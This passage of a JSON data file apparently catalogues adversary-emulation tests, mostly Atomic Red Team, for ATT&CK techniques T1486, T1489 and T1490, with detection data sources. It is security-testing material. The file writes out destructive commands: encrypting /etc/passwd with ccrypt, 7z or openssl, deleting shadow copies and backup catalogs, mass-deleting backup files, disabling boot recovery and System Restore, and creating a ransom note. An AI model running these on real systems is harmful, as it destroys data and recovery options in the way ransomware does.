"name": "Encrypt files using 7z (Linux)", + "auto_generated_guid": "53e6735a-4727-44cc-b35b-237682a151ad", + "description": "Uses 7z to encrypt a file\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "pwd_for_encrypted_file": { + "description": "the password that you want for the encrypted file", + "type": "String", + "default": "passwd" + }, + "encrypted_file_path": { + "description": "path to the encrypted file", + "type": "Path", + "default": "/tmp/passwd.zip" + }, + "input_file_path": { + "description": "path to the file that you want to encrypt", + "type": "Path", + "default": "/etc/passwd" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Finds where 7z is located\n", + "prereq_command": "which_7z=`which 7z`\n", + "get_prereq_command": "" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path}\n", + "cleanup_command": "$which_7z e #{encrypted_file_path}\nrm #{encrypted_file_path}\n" + } + }, + { + "name": "Encrypt files using ccrypt (Linux)", + "auto_generated_guid": "08cbf59f-85da-4369-a5f4-049cffd7709f", + "description": "Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "cped_file_path": { + "description": "path where you want your copied file to be", + "type": "Path", + "default": "/tmp/passwd" + }, + "root_input_file_path": { + "description": "path to the file that you want to be encrypted if you are root user", + "type": "Path", + "default": "/etc/passwd" + }, + "user_input_file_path": { + "description": "path to file that you want to be encrypted if you are normal user", + "type": "Path", + "default": "~/.bash_history" + }, + "impact_command": { + "description": "command to show impact of encryption", + "type": "String", + "default": "sudo su" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Finds where ccencrypt and ccdecrypt is located and copies input file\n", + "prereq_command": "which_ccencrypt=`which ccencrypt`\nwhich_ccdecrypt=`which ccdecrypt`\nif [[ $USER == \"root\" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi\n", + "get_prereq_command": "(which yum && yum -y install epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "if [[ $USER == \"root\" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi\n", + "cleanup_command": "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi \n" + } + }, + { + "name": "Encrypt files using openssl (Linux)", + "auto_generated_guid": "142752dc-ca71-443b-9359-cf6f497315f1", + "description": "Uses openssl to encrypt a file\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "private_key_path": { + "description": "path to the private key", + "type": "Path", + "default": "/tmp/key.pem" + }, + "public_key_path": { + "description": "path to the public key", + "type": "Path", + "default": "/tmp/pub.pem" + }, + "encryption_bit_size": { + "description": "size of the bit of encryption", + "type": "Integer", + "default": 2048 + }, + "encrypted_file_path": { + "description": "path to the encrypted file", + "type": "Path", + "default": "/tmp/passwd.zip" + }, + "input_file_path": { + "description": "path to the file that you want to encrypt", + "type": "Path", + "default": "/etc/passwd" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Finds where openssl is located\n", + "prereq_command": "which_openssl=`which openssl`\n", + "get_prereq_command": "" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}\n$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}\n$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}\n", + "cleanup_command": "$which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path}\nrm #{encrypted_file_path}\n" + } + }, + { + "name": "PureLocker Ransom Note", + "auto_generated_guid": "649349c7-9abf-493b-a7a2-b1aa4d141528", + "description": "building the IOC (YOUR_FILES.txt) for the PureLocker ransomware \nhttps://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "echo T1486 - Purelocker Ransom Note > %USERPROFILE%\\Desktop\\YOUR_FILES.txt\n", + "cleanup_command": "del %USERPROFILE%\\Desktop\\YOUR_FILES.txt >nul 2>&1\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage metadata", + "description": "Data and information that describe a cloud storage and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "cloud storage" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage modification", + "description": "A cloud storage was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "cloud storage bucket" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage modification", + "description": "A cloud storage was modified.", + "source_data_element": "modified", + "relationship": "created", + "target_data_element": "cloud storage object" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://content.fireeye.com/apt/rpt-apt38", + [ + "https://aws.amazon.com/s3/", + "https://azure.microsoft.com/en-us/services/storage/blobs/", + "https://cloud.google.com/storage" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1489", + "command_list": [ + "sc.exe stop spooler\n", + "net.exe stop spooler\n", + "taskkill.exe /f /im spoolsv.exe\n", + "quit app \"Microsoft Outlook.app\"" + ], + "commands": [ + { + "command": "sc.exe stop spooler\n", + "source": "atomics/T1489/T1489.yaml", + "name": "Atomic Red Team Test - Service Stop" + }, + { + "command": "net.exe stop spooler\n", + "source": "atomics/T1489/T1489.yaml", + "name": "Atomic Red Team Test - Service Stop" + }, + { + "command": "taskkill.exe /f /im spoolsv.exe\n", + "source": "atomics/T1489/T1489.yaml", + "name": "Atomic Red Team Test - Service Stop" + }, + { + "command": "quit app \"Microsoft Outlook.app\"", + "source": "data/abilities/impact/3b007f46-23e7-4a11-9c14-e7085b6a754a.yml", + "name": "Quit Outlook" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1489", + "display_name": "Service Stop", + "atomic_tests": [ + { + "name": "Windows - Stop service using Service Controller", + "auto_generated_guid": "21dfb440-830d-4c86-a3e5-2a491d5a8d04", + "description": "Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying\nit has changed to a state of STOP_PENDING. If the spooler service was not running \"The service has not been started.\" will be displayed and it can be\nstarted by running the cleanup command.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "service_name": { + "description": "Name of a service to stop", + "type": "String", + "default": "spooler" + } + }, + "executor": { + "command": "sc.exe stop #{service_name}\n", + "cleanup_command": "sc.exe start #{service_name} >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows - Stop service using net.exe", + "auto_generated_guid": "41274289-ec9c-4213-bea4-e43c4aa57954", + "description": "Stops a specified service using the net.exe command. Upon execution, if the service was running \"The Print Spooler service was stopped successfully.\"\nwill be displayed. If the service was not running, \"The Print Spooler service is not started.\" will be displayed and it can be\nstarted by running the cleanup command.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "service_name": { + "description": "Name of a service to stop", + "type": "String", + "default": "spooler" + } + }, + "executor": { + "command": "net.exe stop #{service_name}\n", + "cleanup_command": "net.exe start #{service_name} >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows - Stop service by killing process", + "auto_generated_guid": "f3191b84-c38b-400b-867e-3a217a27795f", + "description": "Stops a specified service killng the service's process.\nThis technique was used by WannaCry. Upon execution, if the spoolsv service was running \"SUCCESS: The process \"spoolsv.exe\" with PID 2316 has been terminated.\"\nwill be displayed. If the service was not running \"ERROR: The process \"spoolsv.exe\" not found.\" will be displayed and it can be\nstarted by running the cleanup command.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "process_name": { + "description": "Name of a process to kill", + "type": "String", + "default": "spoolsv.exe" + } + }, + "executor": { + "command": "taskkill.exe /f /im #{process_name}\n", + "name": "command_prompt" + } + } + ] + }, + { + "id": "3b007f46-23e7-4a11-9c14-e7085b6a754a", + "name": "Quit Outlook", + "description": "Quit Outlook", + "tactic": "impact", + "technique": { + "attack_id": "T1489", + "name": "Service Stop" + }, + "platforms": { + "darwin": { + "osa": { + "command": "quit app \"Microsoft Outlook.app\"" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process termination", + "description": "A process was terminated.", + "source_data_element": "user", + "relationship": "terminated", + "target_data_element": "process" + } + ], + "external_reference": [ + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1490", + "command_list": [ + "vssadmin.exe delete shadows /all /quiet\n", + "wmic.exe shadowcopy delete\n", + "wbadmin delete catalog -quiet\n", + "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\nbcdedit.exe /set {default} recoveryenabled no\n", + "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}\n", + "del /s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk\n", + "wbadmin delete systemstatebackup -keepVersions:0\n", + "schtasks.exe /Change /TN \"\\Microsoft\\Windows\\SystemRestore\\SR\" /disable\n", + "reg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\" /v \"DisableConfig\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\" /v \"DisableSR\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" /v \"DisableConfig\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" /v \"DisableSR\" /t \"REG_DWORD\" /d \"1\" /f\n" + ], + "commands": [ + { + "command": "vssadmin.exe delete shadows /all /quiet\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + }, + { + "command": "wmic.exe shadowcopy delete\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + }, + { + "command": "wbadmin delete catalog -quiet\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + }, + { + "command": "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\nbcdedit.exe /set {default} recoveryenabled no\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + }, + { + "command": "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + }, + { + "command": "del /s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + }, + { + "command": "wbadmin delete systemstatebackup -keepVersions:0\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + }, + { + "command": "schtasks.exe /Change /TN \"\\Microsoft\\Windows\\SystemRestore\\SR\" /disable\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + }, + { + "command": "reg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\" /v \"DisableConfig\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\" /v \"DisableSR\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" /v \"DisableConfig\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" /v \"DisableSR\" /t \"REG_DWORD\" /d \"1\" /f\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1490", + "display_name": "Inhibit System Recovery", + "atomic_tests": [ + { + "name": "Windows - Delete Volume Shadow Copies", + "auto_generated_guid": "43819286-91a9-4369-90ed-d31fb4da2c01", + "description": "Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon\nexecution, if no shadow volumes exist the message \"No items found that satisfy the query.\" will be displayed. If shadow volumes are present, it\nwill delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n\nconfirmation prompt. Shadow copies can only be created on Windows server or Windows 8.\n\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11)\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Create volume shadow copy of C:\\ . This prereq command only works on Windows Server or Windows 8.\n", + "prereq_command": "if(!(vssadmin.exe list shadows | findstr \"No items found that satisfy the query.\")) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "vssadmin.exe create shadow /for=c:\n" + } + ], + "executor": { + "command": "vssadmin.exe delete shadows /all /quiet\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows - Delete Volume Shadow Copies via WMI", + "auto_generated_guid": "6a3ff8dd-f49c-4272-a658-11c2fe58bd88", + "description": "Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.\nShadow copies can only be created on Windows server or Windows 8.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wmic.exe shadowcopy delete\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows - wbadmin Delete Windows Backup Catalog", + "auto_generated_guid": "263ba6cb-ea2b-41c9-9d4e-b652dadd002c", + "description": "Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution,\n\"The backup catalog has been successfully deleted.\" will be displayed in the PowerShell session.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wbadmin delete catalog -quiet\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows - Disable Windows Recovery Console Repair", + "auto_generated_guid": "cf21060a-80b3-4238-a595-22525de4ab81", + "description": "Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.\nUpon execution, \"The operation completed successfully.\" will be displayed in the powershell session.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\nbcdedit.exe /set {default} recoveryenabled no\n", + "cleanup_command": "bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures >nul 2>&1\nbcdedit.exe /set {default} recoveryenabled yes >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows - Delete Volume Shadow Copies via WMI with PowerShell", + "auto_generated_guid": "39a295ca-7059-4a88-86f6-09556c1211e7", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.\nThis technique is used by numerous ransomware families such as Sodinokibi/REvil.\nExecutes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution\nthere may be no output displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Windows - Delete Backup Files", + "auto_generated_guid": "6b1dbaf6-cc8a-4ea6-891f-6058569653bf", + "description": "Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many \"access is denied\" messages will appear as the commands try\nto delete files from around the system.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "del /s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows - wbadmin Delete systemstatebackup", + "auto_generated_guid": "584331dd-75bc-4c02-9e0b-17f5fd81c748", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wbadmin delete systemstatebackup -keepVersions:0\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows - Disable the SR scheduled task", + "auto_generated_guid": "1c68c68d-83a4-4981-974e-8993055fa034", + "description": "Use schtasks.exe to disable the System Restore (SR) scheduled task\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "schtasks.exe /Change /TN \"\\Microsoft\\Windows\\SystemRestore\\SR\" /disable\n", + "cleanup_command": "schtasks.exe /Change /TN \"\\Microsoft\\Windows\\SystemRestore\\SR\" /enable >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Disable System Restore Through Registry", + "auto_generated_guid": "66e647d1-8741-4e43-b7c1-334760c2047f", + "description": "Modify the registry of the currently logged in user using reg.exe via cmd console to disable system restore on the computer. \nSee how remcos RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\" /v \"DisableConfig\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\" /v \"DisableSR\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" /v \"DisableConfig\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" /v \"DisableSR\" /t \"REG_DWORD\" /d \"1\" /f\n", + "cleanup_command": "reg delete \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\" /v \"DisableConfig\" /f >nul 2>&1\nreg delete \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\" /v \"DisableSR\" /f >nul 2>&1\nreg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" /v \"DisableConfig\" /f >nul 2>&1\nreg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" /v \"DisableSR\" /f >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being 